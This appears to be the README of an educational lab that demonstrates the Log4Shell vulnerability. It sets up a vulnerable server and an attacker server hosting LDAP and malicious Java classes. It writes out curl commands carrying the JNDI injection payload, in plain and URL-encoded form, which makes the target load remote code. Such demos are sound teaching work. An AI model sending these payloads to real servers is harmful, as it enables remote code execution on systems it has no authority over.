This project aims to demonstrate how the Log4Shell / CVE-2021-44228 vulnerability works.
You only need to have Docker installed. Ideally you have two different virtual machines. One for the vulnerable server and one for the malicious server that will host the malicious codebase and a LDAP server.
Optionally you have Make and Docker Compose installed but this is not necesarry since this repo also contains a make.sh
to skip these requirements and use them from within a docker container.
If you haven't already, here are the steps to install Docker on a Debian VM. You can use these steps: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46
git clone git@github.com:mschmnet/Log4Shell-demo.git
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed
This will start a basic LDAP server and basic Python server to serve the malicious Java classes.
You need to provide the IP address or domain name where these servers will be available
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint
or just
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'
where ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}
is just URL encoded
../make.sh stop
../make.sh logs
https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf